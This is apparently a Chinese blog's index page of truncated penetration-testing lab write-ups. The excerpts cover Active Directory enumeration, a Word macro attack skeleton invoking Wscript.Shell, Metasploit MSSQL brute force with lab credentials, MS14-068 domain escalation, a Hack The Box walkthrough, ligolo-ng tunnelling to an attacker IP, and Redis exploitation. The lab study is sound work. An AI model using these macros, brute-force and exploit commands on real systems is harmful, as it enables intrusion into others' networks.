排序
Active Directory Introduction and Enumeration 1
环境Active Directory Enumeration - Enumeration Using Legacy Windows Tools - VM Group 1IP:192.168.169.70-76 首先连接192.168.169.75 Windows11环境xfreerdp /u:stephanie /d:corp.com ...
枚举对象权限
AD 中的一个对象可以通过多个访问控制条目 (ACE) 来应用一组权限。这些 ACE组成访问控制列表 (ACL)。每个 ACE 定义是否可以访问该对象允许或拒绝特定对象 作为一个非常基本的示例,假设域用户...
PsLoggedOn
NetSessionEnum 会在高版本的操作系统不起作用我们可以使用PsLoggedOn工具来代替 PsLoggedOn简介PsLoggedOn 将在HKEY_USERS下枚举注册表项,以检索登录用户的安全标识符 (SID)并将 SID 转换...
客户端攻击1 word宏攻击
1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...
红日靶场3 补充 mssql爆破
在win2008上扫描到了mssql 使用之前收集到的用户名和密码testuser cvcvgjASD!@wwwuser wwwuser_123Aqx 直接复制到/tmp/user.txt中use auxiliary/scanner/mssql/mssql_login set rhosts 192.16...
红日靶场2
实验环境内网网段:10.10.10.1/24DMZ网段:192.168.111.1/24配置信息DCOS:Windows 2012(64)IP:10.10.10.10应用:AD域WEBOS:Windows 2008(64)IP1:10.10.10.80IP2:192.168.111.80PCOS:Windo...
红日靶场4.3 MS14-068(CVE-2014-6324)域控提权利用
参考资料:https://www.cnblogs.com/feizianquan/p/11760564.html 漏洞验证查看SID whoami /usermsfconsole -q search MS14-068 use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set...
Backdoor 利用目录遍历寻找进程
简介BackdoorDifficulty Easy 实验环境攻击者 Kali 10.10.16.7受害者 IP 10.10.11.125 Linux 1. 信息收集收集受害者服务详情22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linu...
红日靶场3.2 隧道建立与内网横向
隧道建立使用ligolo-ngkaliip tuntap add user root mode tun ligolo ip link set ligolo up proxy -selfcertweb./agent -connect 192.168.0.103:11601 -retry -ignore-certkalisession 1 start...
红日靶场7.1 Redis渗透复习与环境变量提权
环境攻击者IP 192.168.1.129web1 Ubuntu外网IP 192.168.1.128 信息收集arp-scan -I eth1 -l找到目标主机IP为192.168.1.128nmap -T5 -A -p- -n -vvv -noscript 192.168.1.12880,81端口开放 ...